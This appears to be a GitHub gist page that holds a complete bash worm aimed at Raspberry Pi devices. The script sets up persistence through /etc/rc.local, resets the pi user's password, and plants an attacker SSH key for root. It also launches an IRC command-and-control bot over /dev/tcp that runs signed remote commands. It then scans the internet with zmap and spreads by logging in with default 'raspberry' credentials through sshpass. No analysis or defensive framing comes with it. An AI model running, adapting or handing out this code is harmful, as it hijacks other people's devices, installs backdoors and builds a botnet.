Created
December 5, 2019 21:32
-
-
Save zzuummaa/8bf51b7716686a5803e16a12923bfe37 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| MYSELF=`realpath $0` | |
| DEBUG=/dev/null | |
| echo $MYSELF >> $DEBUG | |
| if [ "$EUID" -ne 0 ] | |
| then | |
| NEWMYSELF=`mktemp -u 'XXXXXXXX'` | |
| sudo cp $MYSELF /opt/$NEWMYSELF | |
| sudo sh -c "echo '#!/bin/sh -e' > /etc/rc.local" | |
| sudo sh -c "echo /opt/$NEWMYSELF >> /etc/rc.local" | |
| sudo sh -c "echo 'exit 0' >> /etc/rc.local" | |
| sleep 1 | |
| sudo reboot | |
| else | |
| TMP1=`mktemp` | |
| echo $TMP1 >> $DEBUG | |
| killall bins.sh | |
| killall minerd | |
| killall node | |
| killall nodejs | |
| killall ktx-armv4l | |
| killall ktx-i586 | |
| killall ktx-m68k | |
| killall ktx-mips | |
| killall ktx-mipsel | |
| killall ktx-powerpc | |
| killall ktx-sh4 | |
| killall ktx-sparc | |
| killall arm5 | |
| killall zmap | |
| killall kaiten | |
| killall perl | |
| echo "127.0.0.1 bins.deutschland-zahlung.eu" >> /etc/hosts | |
| rm -rf /root/.bashrc | |
| rm -rf /home/pi/.bashrc | |
| usermod -p \$6\$vGkGPKUr\$heqvOhUzvbQ66Nb0JGCijh/81sG1WACcZgzPn8A0Wn58hHXWqy5yOgTlYJEbOjhkHD0MRsAkfJgjU/ioCYDeR1 pi | |
| mkdir -p /root/.ssh | |
| echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCl0kIN33IJISIufmqpqg54D6s4J0L7XV2kep0rNzgY1S1IdE8HDef7z1ipBVuGTygGsq+x4yVnxveGshVP48YmicQHJMCIljmn6Po0RMC48qihm/9ytoEYtkKkeiTR02c6DyIcDnX3QdlSmEqPqSNRQ/XDgM7qIB/VpYtAhK/7DoE8pqdoFNBU5+JlqeWYpsMO+qkHugKA5U22wEGs8xG2XyyDtrBcw10xz+M7U8Vpt0tEadeV973tXNNNpUgYGIFEsrDEAjbMkEsUw+iQmXg37EusEFjCVjBySGH3F+EQtwin3YmxbB9HRMzOIzNnXwCFaYU5JjTNnzylUBp/XB6B" >> /root/.ssh/authorized_keys | |
| echo "nameserver 8.8.8.8" >> /etc/resolv.conf | |
| rm -rf /tmp/ktx* | |
| rm -rf /tmp/cpuminer-multi | |
| rm -rf /var/tmp/kaiten | |
| cat > /tmp/public.pem <<EOFMARKER | |
| -----BEGIN PUBLIC KEY----- | |
| MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC/ihTe2DLmG9huBi9DsCJ90MJs | |
| glv7y530TWw2UqNtKjPPA1QXvNsWdiLpTzyvk8mv6ObWBF8hHzvyhJGCadl0v3HW | |
| rXneU1DK+7iLRnkI4PRYYbdfwp92nRza00JUR7P4pghG5SnRK+R/579vIiy+1oAF | |
| WRq+Z8HYMvPlgSRA3wIDAQAB | |
| -----END PUBLIC KEY----- | |
| EOFMARKER | |
| BOT=`mktemp -u 'XXXXXXXX'` | |
| cat > /tmp/$BOT <<'EOFMARKER' | |
| #!/bin/bash | |
| SYS=`uname -a | md5sum | awk -F' ' '{print $1}'` | |
| NICK=a${SYS:24} | |
| while [ true ]; do | |
| arr[0]="ix1.undernet.org" | |
| arr[1]="ix2.undernet.org" | |
| arr[2]="Ashburn.Va.Us.UnderNet.org" | |
| arr[3]="Bucharest.RO.EU.Undernet.Org" | |
| arr[4]="Budapest.HU.EU.UnderNet.org" | |
| arr[5]="Chicago.IL.US.Undernet.org" | |
| rand=$[$RANDOM % 6] | |
| svr=${arr[$rand]} | |
| eval 'exec 3<>/dev/tcp/$svr/6667;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| continue | |
| fi | |
| echo $NICK | |
| eval 'printf "NICK $NICK\r\n" >&3;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| continue | |
| fi | |
| eval 'printf "USER user 8 * :IRC hi\r\n" >&3;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| continue | |
| fi | |
| # Main loop | |
| while [ true ]; do | |
| eval "read msg_in <&3;" | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| break | |
| fi | |
| if [[ "$msg_in" =~ "PING" ]] ; then | |
| printf "PONG %s\n" "${msg_in:5}"; | |
| eval 'printf "PONG %s\r\n" "${msg_in:5}" >&3;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| break | |
| fi | |
| sleep 1 | |
| eval 'printf "JOIN #biret\r\n" >&3;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| break | |
| fi | |
| elif [[ "$msg_in" =~ "PRIVMSG" ]] ; then | |
| privmsg_h=$(echo $msg_in| cut -d':' -f 3) | |
| privmsg_data=$(echo $msg_in| cut -d':' -f 4) | |
| privmsg_nick=$(echo $msg_in| cut -d':' -f 2 | cut -d'!' -f 1) | |
| hash=`echo $privmsg_data | base64 -d -i | md5sum | awk -F' ' '{print $1}'` | |
| sign=`echo $privmsg_h | base64 -d -i | openssl rsautl -verify -inkey /tmp/public.pem -pubin` | |
| if [[ "$sign" == "$hash" ]] ; then | |
| CMD=`echo $privmsg_data | base64 -d -i` | |
| RES=`bash -c "$CMD" | base64 -w 0` | |
| eval 'printf "PRIVMSG $privmsg_nick :$RES\r\n" >&3;' | |
| if [[ ! "$?" -eq 0 ]] ; then | |
| break | |
| fi | |
| fi | |
| fi | |
| done | |
| done | |
| EOFMARKER | |
| chmod +x /tmp/$BOT | |
| nohup /tmp/$BOT 2>&1 > /tmp/bot.log & | |
| rm /tmp/nohup.log -rf | |
| rm -rf nohup.out | |
| sleep 3 | |
| rm -rf /tmp/$BOT | |
| NAME=`mktemp -u 'XXXXXXXX'` | |
| date > /tmp/.s | |
| apt-get update -y --force-yes | |
| apt-get install zmap sshpass -y --force-yes | |
| while [ true ]; do | |
| FILE=`mktemp` | |
| zmap -p 22 -o $FILE -n 100000 | |
| killall ssh scp | |
| for IP in `cat $FILE` | |
| do | |
| sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & | |
| sshpass -praspberryraspberry993311 scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /opt/.r && sshpass -praspberryraspberry993311 ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" & | |
| done | |
| rm -rf $FILE | |
| sleep 10 | |
| done | |
| fi | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
what is this ?